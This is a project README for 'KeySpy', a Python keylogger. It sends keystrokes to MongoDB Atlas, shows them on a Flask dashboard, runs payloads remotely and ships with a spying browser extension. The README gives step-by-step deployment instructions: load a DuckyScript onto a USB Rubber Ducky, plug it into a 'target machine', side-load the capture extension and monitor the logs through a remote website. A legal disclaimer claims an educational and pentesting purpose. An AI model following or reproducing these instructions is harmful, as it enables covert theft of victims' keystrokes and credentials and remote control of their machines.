KeySpy is a simple Python keylogger with a web interface for viewing captured keystrokes in real-time.
- Captures keystrokes in the background while running.
- Stores captured keystrokes in
mongoDB Atlas
. - Displays captured keystrokes in a web interface using Flask.
- Excute Payloads remotely.
- Capture sites and keystrokes in them using a extension.
- Allows viewing keystrokes from multiple sessions.
- Clone the repository:
git clone https://github.com/3rr0r-505/KeySpy.git
- Navigate to the project directory:
cd KeySpy
- Install the required dependencies using pip:
pip install -r requirements.txt
- Download the DuckyScript.txt and load that in USB Rubber Ducky.
- Connect the USB Rubber Ducky to the target machine at least 30 seconds.
- It will run KeySpy on that machine.
- Download the extension zip file extn.zip and extract the zip file.
- Open the Browser.
- Search this link
chrome://extensions/
. - Click on
Load Unpack
. - Add .extn folder.
[For more info, visit]
WebSpy.
- Visit this site w3blogger.vercel.app to monitor the keylogs and execute payloads remotely
- For Downloading the
kSpy-AIO.exe
file click here. - Create a
mongoDB Atlas
cluster and use the connection links. - Soon the extension will be available on the chrome store.
Contributions are welcome! Feel free to open issues or pull requests for any improvements or bug fixes.
The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources. In this context the term "compromise" is henceforth understood as the leverage of exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.
The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.
This project is licensed under the MIT License 2.0 - see the LICENSE file for details.